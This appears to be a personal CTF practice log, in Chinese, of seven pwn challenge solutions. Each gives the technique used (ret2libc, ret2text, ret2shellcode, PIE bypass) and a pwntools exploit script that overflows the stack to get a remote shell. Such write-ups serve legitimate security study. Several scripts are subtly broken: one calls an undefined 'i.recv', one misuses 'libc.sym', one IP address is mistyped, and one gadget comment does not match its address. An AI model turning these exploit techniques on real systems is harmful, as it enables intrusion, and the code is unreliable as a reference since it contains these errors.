Pwn刷题记录
01[WUSTCTF 2020]getshell2
考点:ret2shellcode
用ida可以看到vulnerable函数里的read函数有栈溢出漏洞
exp:
from pwn import *
#p = process('./pwn')
p = remote("1.14.71.254",'xxxxx')
sh = 0x08048670
#0x08048670 : sh ROPgadget --binary pwn --string "sh"
system = 0x08048529
#0x080482bf : system ROPgadget --binary pwn --string "system"
bin_add = 0x08048658
#ROPgadget --binary pwn --string "bin"
payload = b'a'*(0x18+4)+p32(system)+p32(sh)
p.sendline(payload)
p.interactive()
02[NSSRound#4 SWPU]真签到题来试试吧
考点:ret2libc
用Ida可以看到read函数有栈溢出漏洞
exp:
from pwn import *
#from LibcSearcher import *
context(log_level = 'debug',arch = 'amd64')
p = remote('1.14.71.254',xxxxx)
elf = ELF('./pwn')
libc = ELF('./libc-2.23-x64.so')
#p = process('./pwn')
main = 0x40121B
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
ret = 0x000000000040101a # ret
pop_rdi = 0x0000000000401373 # pop rdi ; ret
payload1 = b'a'* 0x88 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(payload1)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
#libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr-libc.sym['puts']
success("libc:"+hex(libc_base))
system = libc_base + libc.sym['system']
binsh = libc_base + libc.sym('str_bin_sh')
payload2 = b'a'* 0x88 + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)
p.sendline(payload2)
p.interactive()
03[BJDCTF 2020]babystack2.0
考点ret2txet
exp:
from pwn import *
#p = process("./pwn")
p = remote("1.14.71.254",xxxxx)
backdoor = 0x400726
payload = b'a'*0x10+p64(0)+p64(backdoor)
p.recvuntil("name:")
p.sendline("4294967285")
p.recvuntil("name?")
p.sendline(payload)
p.interactive()
04[NISACTF 2022]ezpie
考点:PIE,ret2shellcode
直接把main函数的地址泄露了给我们
exp:
from pwn import *
p = remote('1.14.7.254',28368)
elf = ELF("./pwn")
main = 0x0770
shell = 0x080F
p.recvuntil('gift!')
main_addr=int(i.recv(11),16)
shell_addr=main_addr+(shell-main)
payload=b'a'*(0x2c)+p32(shell_addr)
p.sendlineafter('Input:\n',payload)
p.interactive()
05[CISCN 2019华北]PWN1
考点:ret2text
exp:
from pwn import *
#p = process('./pwn')
elf = ELF('./pwn')
libc =ELF('libc-2.27-x64.so')
p = remote("1.14.71.254",xxxx)
ret = 0x400501
pop_rdi = 0x400793
cat_flag = 0x04007CC
system = elf.plt['system']
p.recvuntil("number.")
payload = b'a'*0x30 + p64(0)+p64(ret)+p64(pop_rdi)+p64(cat_flag)+p64(system)
p.sendline(payload)
p.interactive()
06[HGAME 2022 week1]enter the pwn land
考点:ret2libc
exp:
from pwn import *
p = remote("1.14.71.254",xxxx)
elf = ELF("./pwn")
libc = ELF("./libc-2.27-x64.so")
pop_rdi = 0x0000000000401313
ret=0x000000000040101a
payload1 = b'a'*0x2c+p32(0x2c) + p64(0) + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x401260)
p.sendline(payload1)
p.recvline()
libc_base = u64(p.recv(6).ljust(8,b'\x00')) - libc.sym['puts']
success("libc: " + hex(libc_base))
system = libc_base + libc.sym['system']
bin_sh = libc_base + 0x00000000001b3e1a
payload2 = b'a'*0x2c+p32(0x2c) + p64(0) + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system)
p.sendline(payload2)
p.interactive()
07[NISACTF 2022]ezstack
考点:ret2text
exp:
from pwn import *
elf = ELF("./pwn")
p = remote("1.14.71.254", xxxxx)
system = 0x400726
binsh = 0x0804A024
payload = b'a' * 76 + p32(system) + p32(0xabcdabcd) + p32(binsh)
p.sendlineafter("Welcome to NISACTF\n", payload)
p.interactive()
